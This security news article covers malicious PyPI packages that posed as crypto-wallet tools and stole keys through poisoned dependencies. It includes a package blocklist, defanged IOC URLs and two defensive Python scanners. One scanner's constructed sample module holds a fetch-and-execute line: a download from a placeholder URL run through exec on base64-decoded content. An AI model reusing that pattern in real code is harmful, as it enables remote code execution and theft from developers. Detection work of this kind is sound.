Malicious PyPI Packages Mimic Legitimate Tools


Threat actors target the “PyPI” primarily due to its vast user base and the ease of distributing malicious packages within an “open-source ecosystem.”

The decentralized nature of “PyPI” complicates monitoring efforts which makes it an attractive platform for threat actors seeking to “compromise developer environments” and “disrupt the software supply chain.”


Checkmarx researchers recently found PyPI is under attack and discovered malicious crypto-stealing packages.

A malicious user on PyPI directed a sophisticated “supply chain attack” on 22nd September by “uploading multiple deceptive packages” like “AtomicDecoderss,” “TrustDecoderss,” “WalletDecoderss,” and “ExodusDecodes.”


TrustDecoderss and ExodusDecodes (Source – Medium)

These packages presented themselves as legitimate tools for managing cryptocurrency wallets like “Atomic,” “Trust Wallet,” “Metamask,” “Ronin,” “TronLink,” and “Exodus.”

While appearing to help users recover “mnemonic phrases” (12-24 word backup passwords) and decrypt wallet data, the packages implemented a complex malware strategy through “dependency poisoning.”

Here the malicious code was hidden in supporting packages named “cipherbcryptors” and “ccl_leveldbases” rather than in the main package, Checkmarx added.

The attacker enhanced credibility via professionally crafted “README files” (documentation) with “fake download statistics” and “usage instructions.”

When users installed these packages, the hidden malicious code would activate and steal sensitive cryptocurrency data.

This data includes “private keys” and “mnemonic phrases,” which give the attackers complete access to victims’ cryptocurrency funds worth “millions of dollars.”

The “cipherbcryptors” package represents a sophisticated supply chain attack in the “Python ecosystem,” combining multiple layers of “deception” and “technical sophistication.”

The malware employed “heavy code obfuscation techniques” to mask its true functionality while implementing a “dynamic C2 server infrastructure” that retrieved addresses externally rather than “hard-coding” them.

Attack flow (Source – Medium)

The package remained dormant during “installation” to evade “security scans,” activating only when users called specific cryptocurrency functions.

Once triggered, the malware searched various cryptocurrency wallets for sensitive data.

This sensitive data includes “private keys,” “mnemonic seed phrases,” “wallet balances,” and “transaction histories” held in specific file locations and “data structures.”

All of the identified packages are listed below:

  • atomicdecoderss
  • trondecoderss
  • phantomdecoderss
  • trustdecoderss
  • exodusdecoderss
  • walletdecoderss
  • ccl-localstoragerss
  • exodushcates
  • cipherbcryptors
  • ccl_leveldbases
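The dependency-poisoning setup described above means the package a developer asks for can look harmless while the malicious code arrives through a dependency it declares. As an added example (not Checkmarx's tooling or code from the original article), the following Python script walks a dependency graph and flags any of the packages listed above, including those reached only transitively. Package names are normalized per PEP 503 so that `ccl_leveldbases` and `ccl-leveldbases` match. `SAMPLE_METADATA` is a constructed dependency graph; `installed_dependencies()` reads the real metadata of the current environment through `importlib.metadata`.

```python
"""Flag packages whose dependency chain pulls in a known-bad PyPI distribution.
Added example for this article; it is not Checkmarx tooling. BLOCKLIST holds
the package names the article lists; SAMPLE_METADATA is constructed."""
import re
from importlib.metadata import distributions
from typing import Dict, List, Tuple

BLOCKLIST = {
    "atomicdecoderss", "trondecoderss", "phantomdecoderss", "trustdecoderss",
    "exodusdecoderss", "walletdecoderss", "ccl-localstoragerss", "exodushcates",
    "cipherbcryptors", "ccl_leveldbases",
}


def normalize(name: str) -> str:
    """PEP 503 name normalization: lower-case, runs of '-', '_' or '.' become '-'.
    Needed because 'ccl_leveldbases' and 'CCL-LevelDBases' name the same project."""
    return re.sub(r"[-_.]+", "-", name).lower()


NORMALIZED_BLOCKLIST = {normalize(n) for n in BLOCKLIST}


def requirement_name(req: str) -> str:
    """Bare distribution name from a Requires-Dist string, e.g.
    'ccl_leveldbases>=1.0; python_version>="3.8"' -> 'ccl_leveldbases'."""
    return re.split(r"[\s;\[<>=!~]", req.strip(), maxsplit=1)[0]


def find_poisoned(deps: Dict[str, List[str]]) -> List[Tuple[str, List[str]]]:
    """deps maps each distribution name to its Requires-Dist entries.
    Walks the graph depth-first from the top-level packages (those nobody
    requires) and returns (blocklisted name, path from a root) for every
    blocklisted package reached. Each node is reported once, via the first
    path that reaches it."""
    graph = {normalize(k): [normalize(requirement_name(r)) for r in v]
             for k, v in deps.items()}
    children = {c for cs in graph.values() for c in cs}
    roots = [n for n in graph if n not in children] or list(graph)  # fallback for cycles
    hits: List[Tuple[str, List[str]]] = []
    seen = set()

    def walk(node: str, path: List[str]) -> None:
        if node in seen:
            return
        seen.add(node)
        if node in NORMALIZED_BLOCKLIST:
            hits.append((node, path))
        for child in graph.get(node, []):
            walk(child, path + [child])

    for root in roots:
        walk(root, [root])
    return hits


def installed_dependencies() -> Dict[str, List[str]]:
    """Same shape as SAMPLE_METADATA, read from the current environment."""
    return {d.metadata["Name"]: list(d.requires or []) for d in distributions()}


# Constructed sample: 'myapp' depends on a decoy package that drags in the
# malicious helpers, the layering the article describes.
SAMPLE_METADATA = {
    "myapp": ["trustdecoderss", "requests"],
    "trustdecoderss": ["cipherbcryptors>=1.0", "ccl_leveldbases"],
    "cipherbcryptors": ["requests"],
    "ccl_leveldbases": [],
    "requests": ["urllib3"],
    "urllib3": [],
}

if __name__ == "__main__":
    for name, path in find_poisoned(SAMPLE_METADATA):
        print(f"BLOCKLISTED {name}: pulled in via {' -> '.join(path)}")
    for name, path in find_poisoned(installed_dependencies()):
        print(f"INSTALLED   {name}: pulled in via {' -> '.join(path)}")
```

Running the script against the constructed graph reports `trustdecoderss`, `cipherbcryptors` and `ccl-leveldbases`, each with the path from `myapp` that pulls it in; the same function applied to `installed_dependencies()` checks the live environment. The path matters in practice because it names the decoy package a developer actually chose, which is the one to remove.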

The stolen information was then “encoded” and “exfiltrated” to the attacker’s remote servers via a “carefully directed process.”

This supply chain attack was particularly dangerous due to its combination of “false popularity metrics,” “detailed documentation,” “strategic package naming,” and the “ability to dynamically fetch and execute external code” without package updates.

The architecture of the malware allowed it to bypass traditional “static analysis tools” while maintaining the flexibility to modify its attack patterns via “remote updates.”
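Two behaviours described above leave a footprint that a reviewer can look for before installing a package: code that fetches and executes external content at run time, and code that defers that activity to a function call so nothing happens during installation or import. As an added example (not Checkmarx's analysis code and not from the original article), the following Python script parses a module with `ast` and reports whether it contains both a network call and an `exec`/`eval` on a non-literal value, and whether all of that sits inside functions rather than at module level. The heuristics are deliberately coarse (they match call names only), and both module sources below are constructed, with a placeholder URL.

```python
"""Static check for the 'fetch external code, then execute it' pattern and
for whether that logic is deferred to a function call rather than run at
import time. Added example for this article, not Checkmarx's analysis code.
The two module sources below are constructed; the URL is a placeholder."""
import ast
from typing import Dict, List, Tuple

# Coarse heuristics: attribute names only, so 'requests.get' and 'dict.get'
# both match. Treat hits as leads for manual review, not verdicts.
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post"}
EXEC_CALLS = {"exec", "eval"}
Finding = Tuple[int, str]  # (line number, enclosing function or '<module>')


def _call_name(node: ast.Call) -> str:
    """Return the callee name for foo(...) or obj.foo(...), else ''."""
    if isinstance(node.func, ast.Name):
        return node.func.id
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    return ""


class RemoteExecScanner(ast.NodeVisitor):
    def __init__(self) -> None:
        self.scopes: List[str] = []
        self.network: List[Finding] = []
        self.dynamic_exec: List[Finding] = []

    def visit_FunctionDef(self, node: ast.FunctionDef) -> None:
        self.scopes.append(node.name)
        self.generic_visit(node)
        self.scopes.pop()

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Call(self, node: ast.Call) -> None:
        name = _call_name(node)
        scope = self.scopes[-1] if self.scopes else "<module>"
        if name in NETWORK_CALLS:
            self.network.append((node.lineno, scope))
        elif name in EXEC_CALLS and node.args and not isinstance(node.args[0], ast.Constant):
            # exec/eval of something computed at run time, not a literal string
            self.dynamic_exec.append((node.lineno, scope))
        self.generic_visit(node)  # descend into nested calls


def scan_module(source: str) -> Dict[str, object]:
    scanner = RemoteExecScanner()
    scanner.visit(ast.parse(source))
    suspicious = bool(scanner.network) and bool(scanner.dynamic_exec)
    # 'lazy' means every network and exec call sits inside a function, so the
    # module does nothing at install or import time (the dormancy the article describes).
    lazy = suspicious and all(
        scope != "<module>" for _, scope in scanner.network + scanner.dynamic_exec
    )
    return {
        "suspicious": suspicious,
        "lazy_trigger": lazy,
        "network": scanner.network,
        "dynamic_exec": scanner.dynamic_exec,
    }


# Constructed sample modelled on the behaviour the article describes: the
# wallet helper only reaches out and runs fetched code when it is called.
SAMPLE_MODULE = '''
import base64, urllib.request

def decode_wallet(path):
    # looks like wallet work, but fetches and runs remote code on first use
    payload = urllib.request.urlopen("https://example.invalid/PLACEHOLDER").read()
    exec(base64.b64decode(payload))
    return open(path).read()
'''

# Constructed benign module: network access without dynamic execution.
BENIGN_MODULE = '''
import json, urllib.request

def fetch_prices():
    return json.loads(urllib.request.urlopen("https://example.invalid/prices").read())
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_MODULE), ("benign", BENIGN_MODULE)):
        print(label, scan_module(src))
```

On the constructed sample the scanner reports `suspicious` and `lazy_trigger` both true, with the network call and the `exec` located in `decode_wallet`; the benign module, which only fetches JSON, is not flagged. Because this is a pre-install review aid, the useful next step on a hit is to read the flagged function and its imports rather than to rely on the score alone.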

This illustrates the evolving sophistication of open-source software supply chain attacks.

IOCs

  • hxxps[:]//pastebin[.]com/raw/FZUp6ESH
  • hxxps://decry[.]in/check



